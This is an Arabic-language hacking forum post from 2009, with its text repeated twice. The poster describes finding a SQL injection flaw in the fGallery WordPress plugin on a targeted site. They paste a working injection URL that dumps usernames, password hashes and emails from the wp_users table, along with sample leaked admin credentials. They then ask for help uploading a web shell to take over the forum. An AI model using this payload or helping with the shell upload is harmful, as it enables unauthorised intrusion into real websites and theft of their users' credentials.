black_dream
12-18-2009, 11:35 PM
السلام عليكم..بحثت على سيرفر الموقع المستهدف عن سكربت فوجدت سكربت مشابه أسمها
fgallery
ولما حطيتها ف الموقع
جابلى ثغره واحده أسمهاWordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability
المهم أنه قالى طريقة أستخدامها بكده
Exemple :
http://site.il/wordpress/wp-*******/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--
src='http://site.il/wordpress/wp-*******/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:marku [email protected]' /><br>5 [email protected] Thu, 01 Jan 1970 00:00:00 +0100
Info => admin:051e3db4c8eee42d7c93df48dffe4d5f:markus@swim atyourownrisk.com
admin login http://target.il/wordpress_path/wp/wp-login.php
أنا بقى مش عارف أستخدمها إزاى..وأرفع عليها شل إزاى..(أنا معنديش شيل)وإزاى أخترق المنتدى من خلالها..؟؟يارب حد يجاوبنى أنهرضه لأنى مش فاضى غير فيه بس..وألف شكر ليكو كلكو..
fgallery
ولما حطيتها ف الموقع
جابلى ثغره واحده أسمهاWordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability
المهم أنه قالى طريقة أستخدامها بكده
Exemple :
http://site.il/wordpress/wp-*******/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--
src='http://site.il/wordpress/wp-*******/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:marku [email protected]' /><br>5 [email protected] Thu, 01 Jan 1970 00:00:00 +0100
Info => admin:051e3db4c8eee42d7c93df48dffe4d5f:markus@swim atyourownrisk.com
admin login http://target.il/wordpress_path/wp/wp-login.php
أنا بقى مش عارف أستخدمها إزاى..وأرفع عليها شل إزاى..(أنا معنديش شيل)وإزاى أخترق المنتدى من خلالها..؟؟يارب حد يجاوبنى أنهرضه لأنى مش فاضى غير فيه بس..وألف شكر ليكو كلكو..